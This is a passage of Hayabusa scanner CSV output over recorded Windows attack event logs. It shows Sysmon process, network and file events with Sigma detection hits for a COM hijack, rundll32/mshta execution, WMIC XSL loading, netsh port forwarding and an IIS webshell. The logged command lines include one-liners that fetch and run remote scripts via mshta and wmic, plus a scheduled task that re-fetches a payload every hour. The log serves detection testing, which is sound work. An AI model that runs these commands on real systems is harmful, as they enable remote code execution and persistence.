%SourceUser% | Tgt User: %TargetUser% 
| Access: 0x1fffff | Src PID: 1912 | Src PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00 | Tgt PID: 3944 | Tgt PGUID: 365ABB72-47BB-5CE3-0000-001071AD3E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.474 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\Downloads\test.bat | Process: C:\Users\IEUser\Downloads\com-hijack.exe | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.474 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\com-hijack.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1912 | Src PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00 | Tgt PID: 3176 | Tgt PGUID: 365ABB72-47BB-5CE3-0000-00108CAD3E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.474 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c test.bat | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | LID: 0xc796 | PID: 3944 | PGUID: 365ABB72-47BB-5CE3-0000-001071AD3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.474 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c pause | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | LID: 0xc796 | PID: 3176 | PGUID: 
365ABB72-47BB-5CE3-0000-00108CAD3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.518 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\cmd.exe /c test.bat | LID: 0xc796 | PID: 3168 | PGUID: 365ABB72-47BB-5CE3-0000-001053AF3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.870 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3936 | PGUID: 365ABB72-47BB-5CE3-0000-001019C53E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.279 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 2596 | PGUID: 365ABB72-47BC-5CE3-0000-00107DDD3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.728 
+09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3860 | PGUID: 365ABB72-47BC-5CE3-0000-001044EE3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.728 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 2236 | PGUID: 365ABB72-47BC-5CE3-0000-0010C6F03E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:10.161 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla 
Firefox\firefox.exe"" | LID: 0xc796 | PID: 3920 | PGUID: 365ABB72-47BE-5CE3-0000-0010CF0C3F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:12.705 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3372 | PGUID: 365ABB72-47C0-5CE3-0000-00108D243F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xc796 | PID: 1532 | PGUID: 365ABB72-1A29-5CE4-0000-001054E32101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta 
https://hotelesms.com/talsk.txt"",0,true); | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | LID: 0xc796 | PID: 2920 | PGUID: 365ABB72-1A29-5CE4-0000-00107BE42101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | LID: 0xc796 | PID: 2432 | PGUID: 
365ABB72-1A29-5CE4-0000-001079F92101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.389 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49703 (IEWIN7..home) | Dst: 108.179.232.58:443 (gator4243.hostgator.com) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt | LID: 0xc796 | PID: 3772 | PGUID: 
365ABB72-1A2B-5CE4-0000-00102F502201",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.809 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\MSOFFICE_ | Process: C:\Windows\system32\svchost.exe | PID: 856 | PGUID: 365ABB72-39CB-5CE3-0000-0010E0AC0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:33:00.140 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49704 (IEWIN7..home) | Dst: 105.73.6.112:80 (aka112.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:33:01.141 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49705 (IEWIN7..home) | Dst: 105.73.6.105:80 (aka105.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 
365ABB72-1A29-5CE4-0000-001079F92101,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 13:02:11.307 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2 | LID: 0xf05d | PID: 2888 | PGUID: 365ABB72-C9C3-5CE4-0000-00101F422E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx +2019-05-22 13:02:11.307 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Program Files\Internet Explorer\iexplore.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3156 | Src PGUID: 365ABB72-C9C1-5CE4-0000-00100B222E00 | Tgt PID: 2888 | Tgt PGUID: 365ABB72-C9C3-5CE4-0000-00101F422E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,info,,Process Created,"Cmd: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf347 | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Evas | Exec,SquiblyTwo,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:05.736 
+09:00,IEWIN7,1,medium,Exec,Suspicious WMI Reconnaissance,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Evas,XSL Script Processing,,../hayabusa-rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:05.862 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\wbem\WMIC.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00 | Hash: SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:07.731 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\x50IGVBRfr55_test[1].xsl | Process: C:\Windows\System32\Wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,,Windows Shell File Write to Suspicious Folder,,../hayabusa-rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:08.208 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 
10.0.2.15:49167 (IEWIN7..home) | Dst: 45.76.12.27:443 (45-76-12-27.static.afterburst.com) | User: IEWIN7\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:08.422 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" | LID: 0xf347 | PID: 4056 | PGUID: 365ABB72-CF04-5CE6-0000-001010F20C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:09.576 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49168 (IEWIN7..home) | Dst: 105.73.6.105:80 (aka105.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:50:44.582 +09:00,IEWIN7,1,info,,Process Created,Cmd: wmiadap.exe /F /T /R | Process: C:\Windows\System32\wbem\WMIADAP.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 708 | PGUID: 365ABB72-CF64-5CE6-0000-0010CBD51100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 02:26:08.716 +09:00,IEWIN7,1,info,,Process Created,"Cmd: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat | Process: \\vboxsrv\HTools\msxsl.exe | User: IEWIN7\IEUser | Parent Cmd: 
""C:\Windows\System32\cmd.exe"" | LID: 0xf347 | PID: 3388 | PGUID: 365ABB72-D7B0-5CE6-0000-001077C56D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,Evas,XSL Script Processing,,../hayabusa-rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:26:08.947 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: \\vboxsrv\HTools\msxsl.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3388 | PGUID: 365ABB72-D7B0-5CE6-0000-001077C56D00 | Hash: SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:26:09.437 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat | LID: 0xf347 | PID: 2240 | PGUID: 365ABB72-D7B1-5CE6-0000-00102CD76D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:45:34.538 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf347 | PID: 712 | PGUID: 
365ABB72-DC3E-5CE6-0000-00102BC97200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,info,,Process Created,"Cmd: netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5 | Process: C:\Windows\System32\netsh.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf347 | PID: 4088 | PGUID: 365ABB72-DC5C-5CE6-0000-001066E27200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,LatMov | Evas | C2,Netsh RDP Port Forwarding,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 10:33:53.112 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\windows\system32\cmd.exe"" /c net user | Process: C:\Windows\System32\cmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x9cf992 | PID: 2404 | PGUID: 365ABB72-4A01-5CE7-0000-0010EE9DAC00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Persis,Shells Spawned by Web 
Servers,,../hayabusa-rules/sigma/process_creation/proc_creation_win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.122 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: c:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2580 | Src PGUID: 365ABB72-49D6-5CE7-0000-001020A7A700 | Tgt PID: 2404 | Tgt PGUID: 365ABB72-4A01-5CE7-0000-0010EE9DAC00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,info,,Process Created,"Cmd: net user | Process: C:\Windows\System32\net.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""c:\windows\system32\cmd.exe"" /c net user | LID: 0x9cf992 | PID: 788 